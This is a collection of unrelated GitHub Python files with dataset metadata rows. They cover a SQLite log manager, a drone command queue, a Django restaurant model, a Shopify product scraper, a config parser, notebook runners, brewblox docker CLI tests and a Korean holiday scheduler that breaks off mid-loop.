    def initialize_db(self, db_file: str = None):
        """
        Initialize the local db
        :param db_file: (optional) Name of the database file. If not specified, default name is used
        :raises ValueError: if db_file is empty or whitespace-only
        """
        if db_file is not None:
            # Bug fix: the original only checked str.isspace(), which is False
            # for '' — an empty file name slipped through. strip() rejects both.
            if not db_file.strip():
                raise ValueError("db_file must be a valid file name")
            self._db_name = db_file
            self._full_path = os.path.join(self._data_dir, self._db_name)
        self._make_schema()

    @property
    def db_location(self) -> str:
        """
        Get location of the database file
        :return: String with full path to the database
        """
        return self._full_path

    def _make_schema(self):
        """Create the logs table and its indexes if they do not exist yet."""
        conn = sqlite3.connect(self.db_location)
        try:
            # `with conn:` commits on success / rolls back on error.
            with conn:
                c = conn.cursor()
                logs_create_q = 'CREATE TABLE IF NOT EXISTS logs (' \
                                'run_id TEXT NOT NULL, ' \
                                'node_id TEXT, ' \
                                'tuple_id TEXT, ' \
                                'source TEXT, ' \
                                'operation INTEGER NOT NULL, ' \
                                'epoch DATETIME ' \
                                ');'
                logs_run_idx_create_q = 'CREATE INDEX IF NOT EXISTS run_idx ON logs (run_id);'
                logs_run_node_create_q = 'CREATE INDEX IF NOT EXISTS run_node ON logs (node_id);'
                c.execute(logs_create_q)
                c.execute(logs_run_idx_create_q)
                c.execute(logs_run_node_create_q)
        finally:
            conn.close()

    def flush(self):
        """
        Flush all records from the database leaving schema intact
        """
        conn = sqlite3.connect(self.db_location)
        try:
            with conn:
                c = conn.cursor()
                # Table name is a class constant, not user input.
                c.execute('DELETE FROM {};'.format(self.TABLE_LOGS))
        finally:
            conn.close()

    def __enter__(self) -> 'Benchmark':
        # Forward-reference annotation so the class can be created even when
        # Benchmark is not yet importable at class-definition time.
        if self._connection is not None:
            raise RuntimeError("There is already an open connection")
        self._connection = sqlite3.connect(self.db_location)
        return Benchmark(self._connection)

    def __exit__(self, exc_type, exc_value, traceback):
        # Commit on clean exit, roll back if the body raised; always close.
        if exc_type is not None:
            self._connection.rollback()
        else:
            self._connection.commit()
        self._connection.close()
        self._connection = None
| jcridev/mdde | stats-processor/src/mdde_stats/service/data/manager.py | manager.py | py | 3,347 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.path.abspath",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "os.makedirs",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "errno.EEXIST",
"line_num... |
22773409160 | # -*- coding:utf-8 -*-
"""
Pour éviter de surcharger de commandes le drone.
"""
from vector import Vector
class Queue (object):
    """
    Modulates the flow of commands given to the drone by averaging the
    successive displacement vectors over several frames.
    """
    def __init__(self, drone, cmd_max):
        # Pending displacement samples and their count.
        self.queue = []
        self.processed = []
        self.drone = drone
        # Map of each movement command to its opposite, for callers that need
        # to invert a command.
        self.opposed = {self.drone.forward : self.drone.backward,
                        self.drone.backward : self.drone.forward,
                        self.drone.left : self.drone.right,
                        self.drone.right : self.drone.left,
                        self.drone.down : self.drone.up,
                        self.drone.up : self.drone.down,
                        self.drone.rLeft : self.drone.rRight,
                        self.drone.rRight : self.drone.rLeft}
        self.count = 0
        # Number of samples to accumulate before an automatic flush.
        self.cmd_max = cmd_max

    def flush(self):
        """
        Sends the commands intelligently: sums the displacement vectors to
        improve movement precision and forwards their average to the drone.
        """
        # Robustness fix: guard against division by zero when flush() is
        # called with nothing queued.
        if self.count == 0:
            return
        # Vector representing the average pointing over several frames.
        sum_vector = Vector(0, 0, 0)
        for vector in self.queue:
            sum_vector += vector
        sum_vector /= self.count
        self.drone.processVector(sum_vector)
        self.empty()

    def empty(self):
        """Discard all pending samples."""
        self.queue = []
        self.count = 0

    def add(self, offset):
        """Queue one (x, y, z) displacement sample."""
        self.queue.append(Vector(offset[0], offset[1], offset[2]))
        self.count += 1

    def check(self):
        """Flush automatically once cmd_max samples have accumulated."""
        if self.count >= self.cmd_max:
            self.flush()
| micronoyau/NSA-Drone | queue.py | queue.py | py | 1,609 | python | fr | code | 0 | github-code | 36 | [
{
"api_name": "vector.Vector",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "vector.Vector",
"line_number": 48,
"usage_type": "call"
}
] |
32932643233 | from django.db import models
# from address.models import AddressField
from django import forms
# from django_google_maps import fields as map_fields
from Location.models import Address
from django.utils.html import mark_safe
from django.conf import settings
from django.db.models import Avg
from decimal import *
class ImageUploadForm(forms.Form):
    """Simple form with a single image field, used for image uploads."""
    image = forms.ImageField()
class Restaurant(models.Model):
    """Restaurant listing: identity, contact details, imagery, owner and address."""
    name = models.CharField(max_length=42)
    newfields = models.CharField(max_length=42, null=True, blank=True)
    # Free-text address shown alongside the structured Address relation below.
    restaurant_address = models.CharField("Address", max_length=42, null=True, blank=True)
    email = models.EmailField(max_length=75, blank=True)
    website = models.URLField(max_length=200, null=True, blank=True)
    content = models.TextField()
    created_on = models.DateTimeField(auto_now_add=True)
    # banner_image = models.ImageField(upload_to='restaurant/images/', default='restaurant/images/None/no-img.jpg')
    # logo = models.ImageField(upload_to='restaurant/images/', default='restaurant/images/None/no-img.jpg')
    restaurant_banner_image = models.ImageField("Banner Image", upload_to='restaurant/images/',blank=True)
    restaurant_logo = models.ImageField("Logo", upload_to='restaurant/images/',blank=True)
    # owner = models.ForeignKey('auth.User', related_name='restaurant_owner', editable=False, on_delete=models.CASCADE)
    owner = models.ForeignKey('auth.User', related_name='restaurant_owner', on_delete=models.CASCADE)
    # Structured address (Location app); deleted together with the restaurant.
    address = models.OneToOneField(Address, null=True, related_name='restaurants', on_delete=models.CASCADE)

    def restaurant_logo_tag(self):
        """Render the logo as an <img> tag for the admin list display."""
        return mark_safe('<img class="user-image img-circle" src="%s%s" width="80" height="80" />' % (settings.MEDIA_URL , self.restaurant_logo))
    restaurant_logo_tag.short_description = 'Restaurant Logo'

    # def average_rating(self):
    #     avg = self.reviews.aggregate(Avg('rating'))
    #     return Decimal(avg)

    def __str__(self):
        return self.name

    class Meta:
        ordering = ['created_on']
        # permissions = (
        #     ('read_item','Can read item'),
        # )
| chandra10207/food_delivery | restaurant/models.py | models.py | py | 2,868 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.forms.Form",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "django.forms",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "django.forms.ImageField",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "django.fo... |
70679148583 | import sys
import csv
import json
import time
import urllib.request
from urllib.error import HTTPError
from optparse import OptionParser
import argparse
def get_page(url, page, collection_handle=None):
    """Fetch one page of a shop's /products.json feed.

    :param url: base shop URL (scheme included, no trailing slash)
    :param page: 1-based page number
    :param collection_handle: optional collection to scope the feed to
    :return: list of product dicts (empty when past the last page)

    NOTE: retries forever with a 3-minute sleep on any HTTPError
    (rate limiting / blocking).
    """
    full_url = url
    if collection_handle:
        full_url += '/collections/{}'.format(collection_handle)
    full_url += '/products.json'
    req = urllib.request.Request(
        full_url + '?page={}'.format(page),
        data=None,
    )
    while True:
        try:
            data = urllib.request.urlopen(req).read()
            break
        except HTTPError:
            print('Blocked! Sleeping...')
            time.sleep(180)
            print('Retrying')
    products = json.loads(data.decode())['products']
    return products
def get_page_collections(url):
    """Yield every collection dict from the shop's /collections.json feed.

    Pages through the feed until an empty page is returned; like get_page,
    retries forever with a 3-minute sleep on HTTPError.
    """
    full_url = url + '/collections.json'
    page = 1
    while True:
        req = urllib.request.Request(
            full_url + '?page={}'.format(page),
            data=None,
        )
        while True:
            try:
                data = urllib.request.urlopen(req).read()
                break
            except HTTPError:
                print('Blocked! Sleeping...')
                time.sleep(180)
                print('Retrying')
        cols = json.loads(data.decode())['collections']
        if not cols:
            break
        for col in cols:
            yield col
        page += 1
def check_shopify(url):
    """Return True when *url* serves a readable Shopify /products.json feed."""
    try:
        get_page(url, 1)
    except Exception:
        return False
    return True
def fix_url(url):
    """Normalize a shop URL: trim whitespace, ensure a scheme, drop the trailing slash."""
    cleaned = url.strip()
    if not cleaned.startswith(("http://", "https://")):
        cleaned = "https://" + cleaned
    return cleaned.rstrip("/")
def extract_products_collection(url, col, template):
    """Generator over every variant of every product in collection *col*.

    For BASE/GOOGLE templates yields {'row': row}; otherwise yields the raw
    product and variant alongside the row. Pages through the feed until an
    empty page is returned.
    """
    page = 1
    products = get_page(url, page, col)
    while products:
        for product in products:
            title = product['title']
            product_type = product['product_type']
            product_url = url + '/products/' + product['handle']
            product_handle = product['handle']

            def get_image(variant_id):
                # Find the image explicitly linked to this variant, else ''.
                images = product['images']
                for i in images:
                    k = [str(v) for v in i['variant_ids']]
                    if str(variant_id) in k:
                        return i['src']
                return ''

            for i, variant in enumerate(product['variants']):
                price = variant['price']
                option1_value = variant['option1'] or ''
                option2_value = variant['option2'] or ''
                option3_value = variant['option3'] or ''
                option_value = ' '.join([option1_value, option2_value,
                                         option3_value]).strip()
                sku = variant['sku']
                main_image_src = ''
                if product['images']:
                    main_image_src = product['images'][0]['src']
                # Prefer the variant-specific image, fall back to the first one.
                image_src = get_image(variant['id']) or main_image_src
                stock = 'Yes'
                if not variant['available']:
                    stock = 'No'
                metafields = product['metafields'] if "metafields" in product else []
                row = {
                    'sku': sku, 'product_type': product_type,
                    'title': title, 'option_value': option_value,
                    'price': price, 'stock': stock, 'body': str(product['body_html']),
                    'variant_id': product_handle + str(variant['id']),
                    'product_url': product_url, 'image_src': image_src, "metafields": metafields
                }
                # Merge raw product fields in, then stringify/strip everything.
                row.update(product)
                for k in row:
                    row[k] = str(str(row[k]).strip()) if row[k] else ''
                if template == BASE_TEMPLATE or template == GOOGLE_TEMPLATE:
                    yield {'row': row}
                else: yield {'product': product, 'variant': variant,
                             'row': row
                             }
        page += 1
        products = get_page(url, page, col)
def extract_products(url, path, collections=None, delimiter="\t", template=False):
    """Scrape all (or the selected) collections of *url* and write rows to *path*.

    Rows are buffered in memory and written after the crawl so that header
    columns (MetaFieldN) discovered mid-crawl can be included up front.
    """
    tsv_headers = get_headers(template)
    with open(path, 'w', newline='') as f:
        writer = csv.writer(f, delimiter=delimiter)
        # writer.writerow(tsv_headers)
        seen_variants = set()
        metafields_len = 0
        rows_data = []
        attributes_count = 3
        try:
            for col in get_page_collections(url):
                if collections and col['handle'] not in collections:
                    continue
                handle = col['handle']
                title = col['title']
                for product in extract_products_collection(url, handle, template):
                    # A variant can appear in several collections; emit it once
                    # (except for the ELLIOT_TEMPLATE_1 layout).
                    if template != ELLIOT_TEMPLATE_1:
                        variant_id = product['row']['variant_id']
                        if variant_id in seen_variants:
                            continue
                        seen_variants.add(variant_id)
                    # The 'images' field was stringified earlier; re-parse it.
                    # NOTE(review): the quote swap breaks on values containing
                    # apostrophes — verify against real feeds.
                    images = json.loads(product['row']["images"].replace("'", '"'))
                    images = [x["src"].split("?")[0] for x in images[1:]]
                    if template == BASE_TEMPLATE:
                        # Grow MetaFieldN header columns as larger sets appear.
                        if (len(product['row']['metafields']) > metafields_len):
                            for index in range(len(product['row']['metafields']) - metafields_len):
                                tsv_headers.append("MetaField%i" % (metafields_len + index + 1))
                            metafields_len = len(product['row']['metafields'])
                    if template == GOOGLE_TEMPLATE or template == BASE_TEMPLATE:
                        ret, b = format_row_data(template, product['row'], images, title)
                    else:
                        ret, b = format_row_data(template, product, [], title)
                    if b:
                        for i in ret:
                            rows_data.append(i)
                    else:
                        rows_data.append(ret)
        except Exception as e:
            # Best-effort: on any crawl error, flush what was collected so far
            # and stop the whole process.
            writer.writerow(tsv_headers)
            for row in rows_data:
                writer.writerow(row)
            exit()
        writer.writerow(tsv_headers)
        for row in rows_data:
            writer.writerow(row)
def get_headers(TEMPLATE, attribute_count=3):
    """Return the output header columns for the chosen template.

    The GOOGLE template extends the base column set with the
    google-manufacturer feed fields; every other template uses the base set.
    """
    base_columns = ['Code', 'Collection', 'Category', 'Name', 'Variant Name',
                    'Price', 'In Stock', 'URL', 'Image URL', 'Body']
    if TEMPLATE != GOOGLE_TEMPLATE:
        return base_columns
    google_extra = ['id', 'title', 'GTIN', 'brand', 'product_name',
                    'product_type', 'description', 'image_link',
                    'additional_image_link', 'product_page_url',
                    'release_date', 'disclosure_date', 'suggested_retail_price']
    return base_columns + google_extra
def format_row_data(TEMPLATE, product, images, title):
    """Build one output row from a product-row dict.

    :param product: the flattened 'row' dict built by extract_products_collection
    :param images: list of additional image URLs (query strings stripped)
    :param title: the collection title (used as the 'Collection' column)
    :return: (row_list, is_multi_row); the second element is always False here,
        meaning the caller appends the list as a single row.
    """
    if TEMPLATE == GOOGLE_TEMPLATE:
        # Base columns followed by the google-manufacturer feed fields
        # (see get_headers for the exact column order).
        return ([ product['sku'], str(title), product['product_type'], product['title'], product['option_value'], product['price'], product['stock'], product['product_url'], product['image_src'], product['body'], product['id'], product['title'], product['sku'], product['vendor'], product['title'], product['product_type'], product['body_html'], product['image_src'], ",".join(images), product['product_url'], product['created_at'][0:10], product['created_at'][0:10], product['price'] ],False)
    else:
        # Base columns plus one extra column per metafield value.
        return ([ product['sku'], str(title), product['product_type'], product['title'], product['option_value'], product['price'], product['stock'], product['product_url'], product['image_src'], product['body'] ] + [x for x in product['metafields']],False)
def format_unit_weight(w):
    """Map a weight-unit name or abbreviation to its two-letter code.

    Unrecognized units fall back to "LB" (the original default).
    """
    codes = {
        "ounces": "OZ", "oz": "OZ",
        "grams": "G", "g": "G",
        "pounds": "LB", "lb": "LB",
        "kilograms": "KG", "kg": "KG",
    }
    return codes.get(w.lower(), "LB")
def get_product_row(i,metafields):
quantity = i['inventory_quantity'] if 'inventory_quantity' in i else '1'
weight = ''
unit_of_weight = ''
seo_title = ''
seo_desc = ''
if 'grams' in i :
unit_of_weight = 'grams'
weight = i['grams']
if 'weight_unit' in i:
unit_of_weight = i['weight_unit']
weight = i['weight']
for meta in metafields:
if meta == 'metafields_global_title_tag':
seo_title = metafields[meta]
if meta == 'metafields_global_description_tag':
seo_desc = metafields[meta]
if 'name' in meta and meta['name'] == 'metafields_global_title_tag':
if 'value' in meta:
seo_title = meta['value']
else:
seo_title = str(meta)
if 'name' in meta and meta['name'] == 'metafields_global_description_tag':
if 'value' in meta:
seo_desc = meta['value']
else:
seo_desc = str(meta)
if 'variants' in i:
if len(i['variants']) >= 1:
k = i['variants'][0]
if 'grams' in k :
unit_of_weight = 'grams'
weight = k['grams']
if 'weight_unit' in k:
unit_of_weight = k['weight_unit']
weight = k['weight']
base_price = k['compare_at_price'] if 'compare_at_price' in k else ''
if(base_price == '' or base_price==None): base_price = k['price'] if 'price' in k else ''
sale_price = k['price'] if base_price!='' else ''
try:
if(base_price != '' and sale_price != '' and float(base_price) < float(sale_price)):
tmp_var = sale_price
sale_price = base_price
base_price = tmp_var
except Exception as e:
pass
if sale_price == base_price:
sale_price = ''
return [ base_price, sale_price , quantity , format_unit_weight(unit_of_weight) , weight if weight else '1' , "IN" , "3" , "3" , "3" ,seo_title,seo_desc ]
else:
base_price = i['compare_at_price'] if 'compare_at_price' in i else ''
if(base_price == '' or base_price==None): base_price = i['price'] if 'price' in i else ''
sale_price = i['price'] if base_price!='' else ''
try:
if(base_price != '' and sale_price != '' and float(base_price) < float(sale_price)):
tmp_var = sale_price
sale_price = base_price
base_price = tmp_var
except Exception as e:
pass
if sale_price == base_price:
sale_price = ''
return [ base_price, sale_price , quantity , format_unit_weight(unit_of_weight) , weight if weight else '1' , "IN" , "3" , "3" , "3" ,seo_title,seo_desc ]
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--list-collections', dest="list_collections", action="store_true", help="List collections in the site")
    parser.add_argument("--collections", "-c", dest="collections", default="", help="Download products only from the given collections")
    parser.add_argument("--csv", dest="csv", action="store_true", help="Output format CSV ")
    parser.add_argument("--tsv", dest="tsv", action="store_true", help="Output format TSV")
    parser.add_argument("--google-manufacturer", action="store_true", help="Output google-manufacturer template")
    parser.add_argument("--base-feed", action="store_true", help="Output original Shopify template")

    # constants to avoid string literal comparison
    # (module-level when run as a script; the functions above reference them)
    BASE_TEMPLATE = 0
    GOOGLE_TEMPLATE = 1
    ELLIOT_TEMPLATE = 2
    ELLIOT_TEMPLATE_1 = 3

    # parse_known_args leaves the shop URL in the positional leftovers.
    (options, args) = parser.parse_known_args()
    delimiter = "\t" if options.tsv else ','

    if len(args) > 0:
        url = fix_url(args[0])
        if options.list_collections:
            # Listing mode: print collection handles and do not scrape.
            for col in get_page_collections(url):
                print(col['handle'])
        else:
            collections = []
            if options.collections:
                collections = options.collections.split(',')
            filename = 'products.tsv' if options.tsv else 'products.csv'
if options.google_manufacturer:
extract_products(url, filename, collections , delimiter , GOOGLE_TEMPLATE)
elif not options.base_feed:
extract_products(url, filename, collections , delimiter , GOOGLE_TEMPLATE)
else:
extract_products(url, filename, collections , delimiter , BASE_TEMPLATE) | gilloglym/ShopifyWebScraper | shopify_scraper.py | shopify_scraper.py | py | 13,303 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "urllib.request.request.Request",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "urllib.request.request",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "urllib.request",
"line_number": 15,
"usage_type": "name"
},
{
"api_nam... |
74059837544 | import warnings
import configparser
from pathlib import Path
from typing import List, NamedTuple, Optional
# Parsed contents of one faculty-sync configuration section.
# project/remote/server are None when absent; ignore is a list of patterns.
FileConfiguration = NamedTuple(
    "FileConfiguration",
    [
        ("project", Optional[str]),
        ("remote", Optional[str]),
        ("server", Optional[str]),
        ("ignore", List[str]),
    ],
)
def _empty_file_configuration():
    """Return a FileConfiguration with no values set."""
    return FileConfiguration(project=None, remote=None, server=None, ignore=[])
def _read_ignore_patterns(ignore_string: str) -> List[str]:
return [s.strip() for s in ignore_string.split(",") if s.strip()]
def _create_parser():
    """Build a ConfigParser whose `getlist` converter reads comma-separated values."""
    return configparser.ConfigParser(converters={"list": _read_ignore_patterns})
def _resolve_user_conf_path(user_conf_path=None):
if user_conf_path is None:
user_conf_path = Path.home() / ".config/faculty-sync/faculty-sync.conf"
if not user_conf_path.exists():
user_conf_path = Path.home() / ".config/sml-sync/sml-sync.conf"
if user_conf_path.exists():
warnings.warn(
"Reading configuration from ~/.config/sml-sync/sml-sync.conf. "
"This path is deprecated. "
"Use ~/.config/faculty-sync/faculty-sync.conf."
)
return user_conf_path
def _resolve_project_conf_path(directory, project_conf_path=None):
if project_conf_path is None:
project_conf_path = directory / ".faculty-sync.conf"
if not project_conf_path.exists():
project_conf_path = directory / ".sml-sync.conf"
if project_conf_path.exists():
warnings.warn(
"Reading configuration from .sml-sync.conf. "
"This file is deprecated. Use .faculty-sync.conf."
)
return project_conf_path
def get_config(
    local_directory: str, project_conf_path=None, user_conf_path=None
) -> FileConfiguration:
    """
    Parse a faculty-sync.conf file.
    The function first checks in the passed directory, and if it doesn't
    find a configuration file, checks if there is one in the user directory.

    Parameters: local_directory is the project directory whose section is
    looked up; project_conf_path / user_conf_path override the default
    config-file locations (mainly for tests).
    Returns a FileConfiguration; all fields are empty when no matching
    section exists.
    Raises ValueError when the project-level file has more than one
    section, or when the same directory is configured in both the user
    and the project file.
    """
    directory = Path(local_directory).expanduser().resolve()
    user_conf_path = _resolve_user_conf_path(user_conf_path)
    project_conf_path = _resolve_project_conf_path(
        directory, project_conf_path
    )
    config = _create_parser()
    # Load the user-level file first; a missing file is simply ignored.
    try:
        with user_conf_path.open() as fp:
            config.read_file(fp)
        # "normalise" the paths to avoid issues with symlinks and ~
        # (re-insert every section under its expanded, trailing-slash-free
        # key, skipping DEFAULT and keys already normalised).
        config.read_dict(
            {
                str(Path(key).expanduser()).rstrip("/"): value
                for key, value in config.items()
                if key.lower() != "default"
                and not config.has_section(
                    str(Path(key).expanduser()).rstrip("/")
                )
            }
        )
    except FileNotFoundError:
        pass
    # Then merge the project-level file, whose single section (whatever its
    # name) applies to this directory.  Again a missing file is ignored.
    try:
        project_config = _create_parser()
        with project_conf_path.open() as fp:
            project_config.read_file(fp)
        if len(project_config.sections()) > 1:
            raise ValueError(
                "The project config file is ambiguous, as it has "
                "more than two sections."
            )
        elif len(project_config.sections()) == 1:
            # Configuring the same directory twice is ambiguous.
            if str(directory) in config:
                raise ValueError(
                    "You can't specify configurations for a "
                    "project in both the home and project "
                    "directory."
                )
            config.read_dict(
                {
                    str(directory): project_config[
                        project_config.sections()[0]
                    ]
                }
            )
    except FileNotFoundError:
        pass
    # Finally extract this directory's section, if any.
    if str(directory) in config:
        section = config[str(directory)]
        ignore = section.getlist("ignore")  # converter from _create_parser
        if ignore is None:
            ignore = []
        parsed_configuration = FileConfiguration(
            project=section.get("project"),
            remote=section.get("remote"),
            server=section.get("server"),
            ignore=ignore,
        )
    else:
        parsed_configuration = _empty_file_configuration()
    return parsed_configuration
| facultyai/faculty-sync | faculty_sync/cli/config.py | config.py | py | 4,382 | python | en | code | 10 | github-code | 36 | [
{
"api_name": "typing.NamedTuple",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "typing.Optional",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "typing.Optional",
... |
5054290299 | import os
import papermill as pm
def train_ct(dataset_name, hampel_window_len, num_sigmas):
    """Execute the constant-threshold notebook for one dataset via papermill.

    Parameters:
        dataset_name: name of the dataset; used in the output notebook name.
        hampel_window_len: Hampel-filter window length passed to the notebook.
        num_sigmas: threshold width in standard deviations.
    """
    # Renamed from 'input'/'output': 'input' shadowed the builtin.
    input_nb = "constant-threshold.ipynb"
    output_nb = f"out/constant-threshold-{dataset_name}.ipynb"
    pm.execute_notebook(input_nb, output_nb, parameters=dict(
        dataset_name=dataset_name,
        hampel_window_len=hampel_window_len,
        num_sigmas=num_sigmas,
    ))
def train_all(num_datasets, hampel_window_len, num_sigmas):
    """Run train_ct for datasets wn-000 .. wn-(num_datasets-1).

    Fixes vs. original: removed the dead `i = i + 1` statement (the for-loop
    already advances i) and replaced the `("00"+str(i))[-3:]` padding, which
    silently truncated indices of four or more digits, with str.zfill.
    """
    for i in range(num_datasets):
        name = "wn-" + str(i).zfill(3)  # e.g. 7 -> "wn-007"
        train_ct(name, hampel_window_len, num_sigmas)
# Ensure the output directory for executed notebooks exists.
# 'out_dir' replaces the original 'dir', which shadowed the builtin;
# makedirs(..., exist_ok=True) avoids the check-then-create race.
out_dir = "./out"
os.makedirs(out_dir, exist_ok=True)

# Different training params
#train_all(10, 5, 2)
train_all(10, 5, 3)
#train_all(10, 5, 4)
| williewheeler/time-series-demos | papermill/train-all.py | train-all.py | py | 744 | python | en | code | 18 | github-code | 36 | [
{
"api_name": "papermill.execute_notebook",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "os.mkdir",
... |
21885227488 | """
Tests brewblox_ctl.commands.docker
"""
import pytest
from brewblox_ctl.commands import docker
from brewblox_ctl.testing import check_sudo, invoke
TESTED = docker.__name__
@pytest.fixture
def m_utils(mocker):
    # Patch the utils module used by brewblox_ctl.commands.docker so tests
    # never touch the real system; 'SUDO ' stands in for the sudo prefix
    # that optsudo() would compute.
    m = mocker.patch(TESTED + '.utils', autospec=True)
    m.optsudo.return_value = 'SUDO '
    return m
@pytest.fixture
def m_sh(mocker):
    # Patch the sh() shell runner; check_sudo validates that each issued
    # command carries the mocked 'SUDO ' prefix instead of executing it.
    m = mocker.patch(TESTED + '.sh', autospec=True)
    m.side_effect = check_sudo
    return m
def test_up(m_utils, m_sh):
    # 'up' should always run detached: -d is added when absent...
    invoke(docker.up, '--quiet svc')
    m_sh.assert_called_once_with('SUDO docker compose up -d --quiet svc')
    m_sh.reset_mock()
    # ...and not duplicated when the caller already passes -d.
    invoke(docker.up, '-d --quiet svc')
    m_sh.assert_called_once_with('SUDO docker compose up -d --quiet svc')
def test_down(m_utils, m_sh):
    # Extra CLI args are forwarded verbatim to docker compose down.
    invoke(docker.down, '--quiet')
    m_sh.assert_called_once_with('SUDO docker compose down --quiet')
def test_restart(m_utils, m_sh):
    # 'restart' is implemented as a forced re-create, not 'docker compose restart'.
    invoke(docker.restart, '--quiet svc')
    m_sh.assert_called_once_with('SUDO docker compose up -d --force-recreate --quiet svc')
def test_follow(m_utils, m_sh):
    # With explicit services the names are appended...
    invoke(docker.follow, 'spark-one spark-two')
    m_sh.assert_called_with('SUDO docker compose logs --follow spark-one spark-two')
    # ...and without arguments all services are followed (note trailing space).
    invoke(docker.follow)
    m_sh.assert_called_with('SUDO docker compose logs --follow ')
def test_kill(m_utils, m_sh):
    # Plain kill force-removes all containers; check=False tolerates the
    # command failing when no containers exist.
    invoke(docker.kill)
    m_sh.assert_called_once_with('SUDO docker rm --force $(SUDO docker ps -aq)', check=False)
    m_sh.reset_mock()
    # --zombies with no netstat output: only the rm + the netstat query run.
    m_sh.return_value = ''
    invoke(docker.kill, '--zombies')
    assert m_sh.call_count == 2
    m_sh.reset_mock()
    # --zombies with netstat output: each docker-proxy line (ports 80 and
    # 1883 here) triggers an extra kill call on the zombie process.
    m_sh.return_value = '\n'.join([
        'Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name',
        'tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 5990/docker-proxy',
        'tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 1632/systemd-resolv',
        'tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1787/sshd: /usr/sbi',
        'tcp 0 0 0.0.0.0:1883 0.0.0.0:* LISTEN 138969/docker-proxy',
    ])
    invoke(docker.kill, '--zombies')
    assert m_sh.call_count == 5
    m_sh.reset_mock()
    # Without netstat installed, zombie hunting is skipped entirely.
    m_utils.command_exists.return_value = False
    invoke(docker.kill, '--zombies')
    assert m_sh.call_count == 1
| BrewBlox/brewblox-ctl | test/commands/test_docker.py | test_docker.py | py | 2,291 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "brewblox_ctl.commands.docker.__name__",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "brewblox_ctl.commands.docker",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "pytest.fixture",
"line_number": 13,
"usage_type": "attribute"
}... |
26264738548 | # import member
import datetime as dt
import random
from member import Member
import requests
import json
import pandas as pd
from pandas import json_normalize
from tkinter import *
import numpy as np
class KoreaHolidays:
    """Fetches Korean public-holiday dates from the data.go.kr open API.

    NOTE(review): the service key is hardcoded in source; it should be
    moved to configuration or an environment variable.
    """

    def get_holidays(self):
        """Return this year's holidays as a list of ints in YYYYMMDD form.

        NOTE(review): returns None implicitly when the HTTP status is not
        200; callers iterate the result and would crash on None.
        """
        # 'today' is only used by the commented-out dateName lookup below.
        today = dt.datetime.today().strftime("%Y%m%d")
        today_year = dt.datetime.today().year
        KEY = "pKHtIPLJIFBsdudPWOIF4TEBHnwirJTRIdp7GFfIpKiRTLfHcWWWaPKMATdA9W%2BNFIUt6fd0aPkuoQl1hkKMUw%3D%3D"
        url = (
            "http://apis.data.go.kr/B090041/openapi/service/SpcdeInfoService/getRestDeInfo?_type=json&numOfRows=50&solYear="
            + str(today_year)
            + "&ServiceKey="
            + str(KEY)
        )
        response = requests.get(url)
        if response.status_code == 200:
            json_ob = json.loads(response.text)
            holidays_data = json_ob["response"]["body"]["items"]["item"]
            # Flatten the JSON records into a DataFrame; 'locdate' holds the
            # holiday dates as YYYYMMDD integers.
            dataframe = json_normalize(holidays_data)
            # dateName = dataframe.loc[dataframe["locdate"] == int(today), "dateName"]
            # print(dateName)
            return dataframe["locdate"].to_list()

    def today_is_holiday(self):
        # NOTE(review): misleading name — this returns the full holiday
        # list, not a boolean, and '_today' is computed but never used.
        _today = dt.datetime.now().strftime("%Y%m%d")
        holidays = self.get_holidays()
        return holidays
localToday = dt.datetime.now()
# 날짜설정 완료
# print("localToday.weekday : " + str(localToday.weekday()))
# 공휴일 조건 빼주기
# 공휴일 배열 = holidays
KH = KoreaHolidays()
holidays = KH.today_is_holiday()
for i in holidays: # 공휴일 조건
if i == localToday:
localToday = localToday + dt.timedelta(days=1)
while True: # 금토일 조건도 빼주기
if localToday.weekday() <= 3:
break;
localToday = localToday + dt.timedelta(days=1)
while True: # 금토일 조건도 빼주기
if localToday.weekday() <= 3:
break;
localToday = localToday + dt.timedelta(days=1)
##################################### 함수만들기
def holidayCalculateAndPlus(lt):
    """Return the next schedulable date strictly after ``lt``.

    Advances one day past ``lt`` and keeps advancing while the candidate
    falls on a Korean public holiday or on Fri/Sat/Sun (weekday > 3), so
    scheduled dates land only on Mon-Thu working days.

    Bug fix: the original compared entries of the module-level ``holidays``
    list (ints in YYYYMMDD form, from the API's 'locdate' column) directly
    against a datetime object — which is never equal — so public holidays
    were silently never skipped.  The candidate is now formatted to the
    same YYYYMMDD int before the membership test.  The two copy-pasted
    weekend loops are folded into one loop that re-checks both conditions
    after every advance.
    """
    candidate = lt + dt.timedelta(days=1)
    while True:
        # Skip public holidays (holidays holds YYYYMMDD ints).
        if int(candidate.strftime("%Y%m%d")) in holidays:
            candidate = candidate + dt.timedelta(days=1)
            continue
        # Skip Fri(4)/Sat(5)/Sun(6); only Mon-Thu are schedulable.
        if candidate.weekday() > 3:
            candidate = candidate + dt.timedelta(days=1)
            continue
        return candidate
#####################################
# Collect the distinct team names (first-seen order), then shuffle them.
teamList = []
for member_entry in Member.member:
    team_name = member_entry["team"]
    if team_name not in teamList:
        teamList.append(team_name)
random.shuffle(teamList)
oldMemberList = Member.member
newMemberLIst = []
team = list([] for i in range(0,len(teamList)))
# 팀 나눠주기
for i in range(0,len(teamList)):
for oldMember in oldMemberList:
